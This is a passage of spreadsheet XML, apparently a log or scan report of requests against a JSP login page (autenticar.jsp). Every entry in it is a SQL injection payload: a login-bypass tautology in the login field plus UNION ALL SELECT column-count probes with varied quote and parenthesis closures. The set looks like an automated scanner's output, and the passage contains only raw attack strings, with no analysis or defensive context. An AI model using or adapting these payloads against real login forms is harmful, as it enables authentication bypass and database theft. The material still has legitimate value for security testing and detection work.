    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396,4396--and(('uiys'='uiys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311--and(('tmud'='tmud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118,5118--and((('rgso'='rgso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413,7413--and((('fogz'='fogz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809,6809--and((('trfq'='trfq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243,8243--and((('cerb'='cerb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268,9268--and((('kuxt'='kuxt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243,3243--and((('nigs'='nigs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909,2909--and((('xqie'='xqie&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771,1771--and((('qwjm'='qwjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483,5483--and((('hdqb'='hdqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061,5061--and((('omuf'='omuf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241,8241--and'kdmo'='kdmo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101,5101--and'wrli'='wrli&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237,6237--and'ikqb'='ikqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854,2854--and'hiop'='hiop&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051,6051--and'yzpb'='yzpb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023,8023--and'xqjd'='xqjd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73,73--and'euva'='euva&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311,9311--and'iagt'='iagt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535,8535--and'hfrw'='hfrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860,2860--and'qged'='qged&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160,7160--and('rafv'like'rafv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408,6408--and('apid'like'apid&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438,3438--and('nrud'like'nrud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256,7256--and('ebgg'like'ebgg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259,1259--and('lcus'like'lcus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407,2407--and('zuyg'like'zuyg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933,6933--and('nimk'like'nimk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719,8719--and('koio'like'koio&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382,3382--and('pusw'like'pusw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074,5074--and('cxyj'like'cxyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371,4371--and(('japm'like'japm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884,7884--and(('dvwu'like'dvwu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863,6863--and(('izkw'like'izkw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523,2523--and(('qucj'like'qucj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679,5679--and(('crji'like'crji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992,992--and(('sbtr'like'sbtr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072,7072--and(('umki'like'umki&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630,6630--and(('zaqj'like'zaqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608,2608--and(('rkhk'like'rkhk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289,8289--and(('djqp'like'djqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151--and((('szja'like'szja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325--and((('hgps'like'hgps&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646,3646--and((('khcg'like'khcg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717,7717--and((('lrvq'like'lrvq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825--and((('hbmk'like'hbmk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029,7029--and((('swwh'like'swwh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293,1293--and((('tjnk'like'tjnk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893,1893--and((('tmrl'like'tmrl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627,4627--and((('maxv'like'maxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007,3007--and((('tqjh'like'tqjh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458,458--and'bmos'like'bmos&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428,9428--and'hsws'like'hsws&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314,4314--and'mrxm'like'mrxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065,3065--and'jgkg'like'jgkg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788,6788--and'zaxl'like'zaxl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781,8781--and'smdh'like'smdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041--and'mlkm'like'mlkm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767,1767--and'bgey'like'bgey&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081,5081--and'gwvd'like'gwvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391,9391--and'cjsg'like'cjsg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166,8166--and("gyqx"="gyqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896,4896--and("rqle"="rqle&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081--and("dmmc"="dmmc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617,2617--and("bsjj"="bsjj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357,9357--and("gyjm"="gyjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989,1989--and("faml"="faml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663,2663--and("qhuc"="qhuc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129,8129--and("juxu"="juxu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774,2774--and("afso"="afso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713,1713--and("rvzn"="rvzn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118,1118--and(("vwnt"="vwnt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140,5140--and(("rief"="rief&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548,6548--and(("heru"="heru&amp;modo=entrar</t>
  </si>
  <si>
